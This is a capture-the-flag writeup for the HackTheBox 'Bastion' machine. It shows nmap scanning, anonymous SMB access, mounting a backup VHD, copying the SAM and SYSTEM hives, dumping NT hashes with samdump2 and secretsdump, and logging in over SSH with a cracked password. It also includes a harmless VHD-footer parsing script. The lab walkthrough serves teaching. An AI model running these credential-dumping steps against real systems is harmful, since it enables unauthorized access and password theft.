
HTB Bastion Writeup

HackTheBox Bastion – Today we are solving another HTB machine, Bastion, and will learn some cool hacking/CTF stuff along the way.

As always, we run a minimal nmap scan first.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ nmap bastion.htb
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-20 19:13 IST
Nmap scan report for bastion.htb (10.10.10.134)
Host is up (0.17s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 13.67 seconds

From the initial scan we know the open ports, so let's scan only those for more information (service versions, default scripts and OS detection).

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ sudo nmap -sV -sC -A -O -p22,135,139,445 bastion.htb -oA bastion -vv
[sudo] password for abhinav: 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-20 19:15 IST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:15
Completed NSE at 19:15, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:15
Completed NSE at 19:15, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:15
Completed NSE at 19:15, 0.00s elapsed
Initiating Ping Scan at 19:15
Scanning bastion.htb (10.10.10.134) [4 ports]
Completed Ping Scan at 19:15, 0.23s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 19:15
Scanning bastion.htb (10.10.10.134) [4 ports]
Discovered open port 135/tcp on 10.10.10.134
Discovered open port 22/tcp on 10.10.10.134
Discovered open port 445/tcp on 10.10.10.134
Discovered open port 139/tcp on 10.10.10.134
Completed SYN Stealth Scan at 19:15, 0.27s elapsed (4 total ports)
Initiating Service scan at 19:15
Scanning 4 services on bastion.htb (10.10.10.134)
Completed Service scan at 19:15, 6.71s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against bastion.htb (10.10.10.134)
Retrying OS detection (try #2) against bastion.htb (10.10.10.134)
Initiating Traceroute at 19:15
Completed Traceroute at 19:15, 0.19s elapsed
Initiating Parallel DNS resolution of 1 host. at 19:15
Completed Parallel DNS resolution of 1 host. at 19:15, 0.03s elapsed
NSE: Script scanning 10.10.10.134.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:15
Completed NSE at 19:15, 12.47s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:15
Completed NSE at 19:15, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:15
Completed NSE at 19:15, 0.00s elapsed
Nmap scan report for bastion.htb (10.10.10.134)
Host is up, received echo-reply ttl 127 (0.18s latency).
Scanned at 2021-07-20 19:15:33 IST for 24s

PORT    STATE SERVICE      REASON          VERSION
22/tcp  open  ssh          syn-ack ttl 127 OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3bG3TRRwV6dlU1lPbviOW+3fBC7wab+KSQ0Gyhvf9Z1OxFh9v5e6GP4rt5Ss76ic1oAJPIDvQwGlKdeUEnjtEtQXB/78Ptw6IPPPPwF5dI1W4GvoGR4MV5Q6CPpJ6HLIJdvAcn3isTCZgoJT69xRK0ymPnqUqaB+/ptC4xvHmW9ptHdYjDOFLlwxg17e7Sy0CA67PW/nXu7+OKaIOx0lLn8QPEcyrYVCWAqVcUsgNNAjR4h1G7tYLVg3SGrbSmIcxlhSMexIFIVfR37LFlNIYc6Pa58lj2MSQLusIzRoQxaXO4YSp/dM1tk7CN2cKx1PTd9VVSDH+/Nq0HCXPiYh3
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBF1Mau7cS9INLBOXVd4TXFX/02+0gYbMoFzIayeYeEOAcFQrAXa1nxhHjhfpHXWEj2u0Z/hfPBzOLBGi/ngFRUg=
|   256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB34X2ZgGpYNXYb+KLFENmf0P0iQ22Q0sjws2ATjFsiN
135/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows Server 2016 build 10586 - 14393 (96%), Microsoft Windows Server 2016 (95%), Microsoft Windows 10 1507 (93%), Microsoft Windows 10 1507 - 1607 (93%), Microsoft Windows 10 1511 (93%), Microsoft Windows Server 2012 (93%), Microsoft Windows Server 2012 R2 (93%), Microsoft Windows Server 2012 R2 Update 1 (93%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%), Microsoft Windows Vista SP1 - SP2, Windows Server 2008 SP2, or Windows 7 (93%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.91%E=4%D=7/20%OT=22%CT=%CU=34383%PV=Y%DS=2%DC=T%G=N%TM=60F6D395%P=x86_64-pc-linux-gnu)
SEQ(SP=108%GCD=1%ISR=10E%TI=I%CI=I%II=I%SS=S%TS=A)
OPS(O1=M54DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M54DNW8ST11%O6=M54DST11)
WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)
ECN(R=Y%DF=Y%T=80%W=2000%O=M54DNW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)
T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)
T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=80%CD=Z)

Uptime guess: 0.005 days (since Tue Jul 20 19:09:08 2021)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -38m18s, deviation: 1h09m14s, median: 1m39s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 9831/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 26941/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 57335/udp): CLEAN (Failed to receive data)
|   Check 4 (port 18741/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-07-20T15:47:29+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-07-20T13:47:26
|_  start_date: 2021-07-20T13:41:01

TRACEROUTE (using port 135/tcp)
HOP RTT       ADDRESS
1   175.65 ms 10.10.14.1
2   176.04 ms bastion.htb (10.10.10.134)

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:15
Completed NSE at 19:15, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:15
Completed NSE at 19:15, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:15
Completed NSE at 19:15, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.02 seconds
           Raw packets sent: 50 (3.604KB) | Rcvd: 49 (3.436KB)

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ 

We see some interesting information in the detailed nmap scan: SSH (OpenSSH for Windows), SMB with guest access and signing not required, Windows Server 2016, and more.

For me, and I think for most people, SMB is the most exciting piece to check first.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ smbclient --list //bastion.htb/ -U ""
Enter WORKGROUP's password: 

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	Backups         Disk      
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
SMB1 disabled -- no workgroup available

From the above we can infer that we should focus on the Backups share, which smbclient lists without any credentials.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ smbclient //bastion.htb/Backups -U ""
Enter WORKGROUP's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Apr 16 15:32:11 2019
  ..                                  D        0  Tue Apr 16 15:32:11 2019
  note.txt                           AR      116  Tue Apr 16 15:40:09 2019
  SDT65CB.tmp                         A        0  Fri Feb 22 18:13:08 2019
  WindowsImageBackup                 Dn        0  Fri Feb 22 18:14:02 2019

		7735807 blocks of size 4096. 2763249 blocks available
smb: \> get note.txt
getting file \note.txt of size 116 as note.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)

The interesting entries are note.txt, which we fetch with get in smbclient (above), and WindowsImageBackup, which would usually be too large to pull over the VPN.

The content of note.txt is below:

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ ls | grep note
note.txt

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ cat note.txt 
Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.

So the other piece of information is the WindowsImageBackup directory; let's look further into that.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ smbclient //bastion.htb/Backups -U ""
Enter WORKGROUP's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Apr 16 15:32:11 2019
  ..                                  D        0  Tue Apr 16 15:32:11 2019
  note.txt                           AR      116  Tue Apr 16 15:40:09 2019
  SDT65CB.tmp                         A        0  Fri Feb 22 18:13:08 2019
  WindowsImageBackup                 Dn        0  Fri Feb 22 18:14:02 2019

		7735807 blocks of size 4096. 2747596 blocks available
smb: \> cd WindowsImageBackup
smb: \WindowsImageBackup\> ls
  .                                  Dn        0  Fri Feb 22 18:14:02 2019
  ..                                 Dn        0  Fri Feb 22 18:14:02 2019
  L4mpje-PC                          Dn        0  Fri Feb 22 18:15:32 2019

		7735807 blocks of size 4096. 2747596 blocks available
smb: \WindowsImageBackup\> cd L4mpje-PC
smb: \WindowsImageBackup\L4mpje-PC\> ls
  .                                  Dn        0  Fri Feb 22 18:15:32 2019
  ..                                 Dn        0  Fri Feb 22 18:15:32 2019
  Backup 2019-02-22 124351           Dn        0  Fri Feb 22 18:15:32 2019
  Catalog                            Dn        0  Fri Feb 22 18:15:32 2019
  MediaId                            An       16  Fri Feb 22 18:14:02 2019
  SPPMetadataCache                   Dn        0  Fri Feb 22 18:15:32 2019

		7735807 blocks of size 4096. 2747596 blocks available
smb: \WindowsImageBackup\L4mpje-PC\> cd "Backup 2019-02-22 124351"
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> ls
  .                                  Dn        0  Fri Feb 22 18:15:32 2019
  ..                                 Dn        0  Fri Feb 22 18:15:32 2019
  9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd     An 37761024  Fri Feb 22 18:14:03 2019
  9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd     An 5418299392  Fri Feb 22 18:15:32 2019
  BackupSpecs.xml                    An     1186  Fri Feb 22 18:15:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml     An     1078  Fri Feb 22 18:15:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml     An     8930  Fri Feb 22 18:15:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml     An     6542  Fri Feb 22 18:15:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml     An     2894  Fri Feb 22 18:15:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml     An     1488  Fri Feb 22 18:15:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml     An     1484  Fri Feb 22 18:15:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml     An     3844  Fri Feb 22 18:15:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml     An     3988  Fri Feb 22 18:15:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml     An     7110  Fri Feb 22 18:15:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml     An  2374620  Fri Feb 22 18:15:32 2019

		7735807 blocks of size 4096. 2747596 blocks available
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> 

Let's mount one of these VHDs on our local machine, since, as the note clearly says, downloading the backup is not an option. The larger of the two (about 5.4 GB) is the one that holds the system volume.

We will use qemu-utils, which can be installed if it is not already present:

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ sudo apt-get install qemu-utils
[sudo] password for abhinav: 
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following packages were automatically installed and are no longer required:
  linux-image-5.10.0-kali3-amd64 python3-gevent python3-gevent-websocket python3-greenlet python3-jupyter-core python3-m2crypto python3-nbformat python3-parameterized python3-plotly python3-zope.event
Use 'sudo apt autoremove' to remove them.
Suggested packages:
  debootstrap qemu-block-extra
The following NEW packages will be installed:
  qemu-utils
0 upgraded, 1 newly installed, 0 to remove and 28 not upgraded.
Need to get 1,205 kB of archives.
After this operation, 6,224 kB of additional disk space will be used.
Get:1 https://hlzmel.fsmg.org.nz/kali kali-rolling/main amd64 qemu-utils amd64 1:5.2+dfsg-10+b2 [1,205 kB]
Fetched 1,205 kB in 8s (158 kB/s)
Selecting previously unselected package qemu-utils.
(Reading database ... 385831 files and directories currently installed.)
Preparing to unpack .../qemu-utils_1%3a5.2+dfsg-10+b2_amd64.deb ...
Unpacking qemu-utils (1:5.2+dfsg-10+b2) ...
Setting up qemu-utils (1:5.2+dfsg-10+b2) ...
Processing triggers for man-db (2.9.4-2) ...
Processing triggers for kali-menu (2021.2.3) ...

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ 

Let's mount the VHD 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd now; you can search for how to do this. The idea is to mount the share itself with CIFS, attach the VHD on the share to a network block device with qemu-nbd (read-only), and then mount the first partition of that device.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ sudo mkdir /mnt/L4mpje-PC
[sudo] password for abhinav: 

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ sudo mkdir /mnt/vhd

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ sudo modprobe nbd

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ sudo mount -t cifs //bastion.htb/Backups/WindowsImageBackup/L4mpje-PC /mnt/L4mpje-PC/ -o user=anonymous
Password for anonymous@//bastion.htb/Backups/WindowsImageBackup/L4mpje-PC: 

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ sudo qemu-nbd -r -c /dev/nbd0 "/mnt/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd"

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ sudo mount -r /dev/nbd0p1 /mnt/vhd

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ 
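Before attaching a multi-gigabyte image over a slow VPN it helps to know what kind of VHD it is. The following is an added example (not from the original writeup) that reads only the 512-byte footer at the end of a VHD, which is the same structure qemu's vpc driver uses to learn the disk type and size, so a CIFS-mounted image costs one small read instead of a full transfer. The file path is assumed; the build_footer helper produces constructed test data, not bytes from the real backup.

```python
"""Inspect a VHD without transferring it: parse the 512-byte footer at the end of the image."""
import struct
import sys
from dataclasses import dataclass

# Footer layout from the Microsoft VHD specification; all integers are big-endian.
FOOTER_FMT = ">8sIIQI4sI4sQQHBBII16sB427s"
FOOTER_SIZE = struct.calcsize(FOOTER_FMT)  # 512 bytes
COOKIE = b"conectix"
DISK_TYPES = {2: "fixed", 3: "dynamic", 4: "differencing"}
CHECKSUM_OFFSET = 64  # the 4-byte checksum field follows the disk-type field


@dataclass
class VhdFooter:
    disk_type: str
    current_size: int    # size of the virtual disk in bytes
    original_size: int
    data_offset: int     # 0xFFFFFFFFFFFFFFFF for fixed disks, dynamic-header offset otherwise
    checksum_ok: bool
    geometry: tuple      # (cylinders, heads, sectors per track)


def vhd_checksum(footer: bytes) -> int:
    """One's complement of the byte sum over the footer with the checksum field zeroed."""
    total = sum(footer[:CHECKSUM_OFFSET]) + sum(footer[CHECKSUM_OFFSET + 4:])
    return (~total) & 0xFFFFFFFF


def parse_vhd_footer(footer: bytes) -> VhdFooter:
    if len(footer) != FOOTER_SIZE:
        raise ValueError("footer must be exactly %d bytes" % FOOTER_SIZE)
    fields = struct.unpack(FOOTER_FMT, footer)
    cookie, data_offset = fields[0], fields[3]
    orig_size, cur_size, cyl, heads, spt, disk_type, checksum = fields[8:15]
    if cookie != COOKIE:
        raise ValueError("not a VHD footer: cookie %r" % cookie)
    return VhdFooter(
        disk_type=DISK_TYPES.get(disk_type, "unknown(%d)" % disk_type),
        current_size=cur_size,
        original_size=orig_size,
        data_offset=data_offset,
        checksum_ok=(checksum == vhd_checksum(footer)),
        geometry=(cyl, heads, spt),
    )


def read_vhd_footer(path: str) -> VhdFooter:
    """Seek to the end and read only the footer; nothing else of the image is touched."""
    with open(path, "rb") as fh:
        fh.seek(-FOOTER_SIZE, 2)
        return parse_vhd_footer(fh.read(FOOTER_SIZE))


def build_footer(current_size: int, disk_type: int,
                 data_offset: int = 0xFFFFFFFFFFFFFFFF) -> bytes:
    """Construct a valid footer (constructed test data, not taken from the real backup)."""
    fields = [COOKIE, 2, 0x00010000, data_offset, 0, b"qemu", 0x00010000, b"Wi2k",
              current_size, current_size, 0, 0, 0, disk_type, 0, b"\x00" * 16, 0, b"\x00" * 427]
    fields[14] = vhd_checksum(struct.pack(FOOTER_FMT, *fields))  # fill in the checksum field
    return struct.pack(FOOTER_FMT, *fields)


if __name__ == "__main__":
    # Usage: python3 vhdinfo.py "/mnt/L4mpje-PC/Backup 2019-02-22 124351/<name>.vhd"
    info = read_vhd_footer(sys.argv[1])
    print("%s VHD, %.2f GiB, checksum %s" % (
        info.disk_type, info.current_size / 2 ** 30, "ok" if info.checksum_ok else "BAD"))
```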

Now that the VHD 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd is mounted, we can browse its contents.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ cd /mnt/vhd

┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd]
└─$ ls -la
total 2096745
drwxrwxrwx 1 root root      12288 Feb 22  2019  .
drwxr-xr-x 4 root root       4096 Jul 21 01:04  ..
drwxrwxrwx 1 root root          0 Feb 22  2019 '$Recycle.Bin'
-rwxrwxrwx 1 root root         24 Jun 11  2009  autoexec.bat
-rwxrwxrwx 1 root root         10 Jun 11  2009  config.sys
lrwxrwxrwx 2 root root         14 Jul 14  2009 'Documents and Settings' -> /mnt/vhd/Users
-rwxrwxrwx 1 root root 2147016704 Feb 22  2019  pagefile.sys
drwxrwxrwx 1 root root          0 Jul 14  2009  PerfLogs
drwxrwxrwx 1 root root       4096 Jul 14  2009  ProgramData
drwxrwxrwx 1 root root       4096 Apr 12  2011 'Program Files'
drwxrwxrwx 1 root root          0 Feb 22  2019  Recovery
drwxrwxrwx 1 root root       4096 Feb 22  2019 'System Volume Information'
drwxrwxrwx 1 root root       4096 Feb 22  2019  Users
drwxrwxrwx 1 root root      16384 Feb 22  2019  Windows

Dumb me tried to search for the user flag here, but no luck (this is a backup of L4mpje-PC, not the live box); the contents of a few folders are shown below.

┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd]
└─$ cd Users

┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd/Users]
└─$ ls
'All Users'   Default  'Default User'   desktop.ini   L4mpje   Public

┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd/Users]
└─$ cd L4mpje

┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd/Users/L4mpje]
└─$ ls
 AppData             Documents         Music                                                     NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms   Pictures       SendTo
'Application Data'   Downloads        'My Documents'                                             NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms   PrintHood     'Start Menu'
 Contacts            Favorites         NetHood                                                   ntuser.dat.LOG1                                                                                Recent         Templates
 Cookies             Links             NTUSER.DAT                                                ntuser.dat.LOG2                                                                               'Saved Games'   Videos
 Desktop            'Local Settings'   NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf   ntuser.ini                                                                                     Searches

┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd/Users/L4mpje]
└─$ cd Desktop

┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd/Users/L4mpje/Desktop]
└─$ ls
desktop.ini

┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd/Users/L4mpje/Desktop]
└─$ cd ..

┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd/Users/L4mpje]
└─$ cd Documents

┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd/Users/L4mpje/Documents]
└─$ ls
desktop.ini  'My Music'  'My Pictures'  'My Videos'

┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd/Users/L4mpje/Documents]
└─$ cd ..

When on a Windows box, it is a crime not to look at the config folder under System32, where the registry hives live, to see if we can get hold of any users or hashes, so let's go there.

┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd]
└─$ cd Windows/System32/config/

┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd/Windows/System32/config]
└─$ ls -la
total 74740
drwxrwxrwx 1 root root    12288 Feb 22  2019 .
drwxrwxrwx 1 root root   655360 Feb 22  2019 ..
-rwxrwxrwx 2 root root    28672 Feb 23  2019 BCD-Template
-rwxrwxrwx 2 root root    25600 Feb 23  2019 BCD-Template.LOG
-rwxrwxrwx 2 root root 30932992 Feb 22  2019 COMPONENTS
-rwxrwxrwx 2 root root  1048576 Feb 22  2019 COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.0.regtrans-ms
-rwxrwxrwx 2 root root  1048576 Feb 22  2019 COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.1.regtrans-ms
-rwxrwxrwx 2 root root  1048576 Feb 22  2019 COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.2.regtrans-ms
-rwxrwxrwx 2 root root    65536 Feb 22  2019 COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.blf
-rwxrwxrwx 2 root root    65536 Feb 22  2019 COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TM.blf
-rwxrwxrwx 2 root root   524288 Feb 22  2019 COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms
-rwxrwxrwx 2 root root   524288 Jul 14  2009 COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms
-rwxrwxrwx 2 root root     1024 Apr 12  2011 COMPONENTS.LOG
-rwxrwxrwx 2 root root   262144 Feb 22  2019 COMPONENTS.LOG1
-rwxrwxrwx 2 root root        0 Jul 14  2009 COMPONENTS.LOG2
-rwxrwxrwx 1 root root   262144 Feb 22  2019 DEFAULT
-rwxrwxrwx 1 root root     1024 Apr 12  2011 DEFAULT.LOG
-rwxrwxrwx 2 root root    91136 Feb 22  2019 DEFAULT.LOG1
-rwxrwxrwx 2 root root        0 Jul 14  2009 DEFAULT.LOG2
drwxrwxrwx 1 root root        0 Jul 14  2009 Journal
drwxrwxrwx 1 root root        0 Feb 22  2019 RegBack
-rwxrwxrwx 1 root root   262144 Feb 22  2019 SAM
-rwxrwxrwx 1 root root     1024 Apr 12  2011 SAM.LOG
-rwxrwxrwx 2 root root    21504 Feb 22  2019 SAM.LOG1
-rwxrwxrwx 2 root root        0 Jul 14  2009 SAM.LOG2
-rwxrwxrwx 1 root root   262144 Feb 22  2019 SECURITY
-rwxrwxrwx 1 root root     1024 Apr 12  2011 SECURITY.LOG
-rwxrwxrwx 2 root root    21504 Feb 22  2019 SECURITY.LOG1
-rwxrwxrwx 2 root root        0 Jul 14  2009 SECURITY.LOG2
-rwxrwxrwx 1 root root 24117248 Feb 22  2019 SOFTWARE
-rwxrwxrwx 1 root root     1024 Apr 12  2011 SOFTWARE.LOG
-rwxrwxrwx 2 root root   262144 Feb 22  2019 SOFTWARE.LOG1
-rwxrwxrwx 2 root root        0 Jul 14  2009 SOFTWARE.LOG2
-rwxrwxrwx 1 root root  9699328 Feb 22  2019 SYSTEM
-rwxrwxrwx 1 root root     1024 Apr 12  2011 SYSTEM.LOG
-rwxrwxrwx 2 root root   262144 Feb 22  2019 SYSTEM.LOG1
-rwxrwxrwx 2 root root        0 Jul 14  2009 SYSTEM.LOG2
drwxrwxrwx 1 root root     4096 Nov 21  2010 systemprofile
drwxrwxrwx 1 root root     4096 Feb 22  2019 TxR

SAM and SYSTEM are readable, so let's copy them out and dump the hashes. Both hives are needed because the hashes in SAM are encrypted with a boot key that is stored in SYSTEM; we can do the dump using samdump2.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ cp /mnt/vhd/Windows/System32/config/SYSTEM .

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ cp /mnt/vhd/Windows/System32/config/SAM .

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ ls
bastion.gnmap  bastion.nmap  bastion.xml  note.txt  SAM  SYSTEM

Let's use samdump2:

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ samdump2 ./SYSTEM ./SAM
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::

We already have the information we were looking for, but another tool that does the same job is Impacket's secretsdump.py:

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ secretsdump.py LOCAL -system ./SYSTEM -sam ./SAM
Impacket v0.9.24.dev1+20210611.72516.1a5ed9dc - Copyright 2021 SecureAuth Corporation

[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Cleaning up... 

You can use your favourite hash cracker or an online lookup to recover the password behind L4mpje's NT hash.

CrackStation had this hash in its tables.

So we have some juicy information: L4mpje : bureaulampje. What next? SSH.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ ssh L4mpje@bastion.htb
The authenticity of host 'bastion.htb (10.10.10.134)' can't be established.
ECDSA key fingerprint is SHA256:ILc1g9UC/7j/5b+vXeQ7TIaXLFddAbttU86ZeiM/bNY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? Yes
Warning: Permanently added 'bastion.htb,10.10.10.134' (ECDSA) to the list of known hosts.
L4mpje@bastion.htb's password: 
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

l4mpje@BASTION C:\Users\L4mpje>cd Desktop

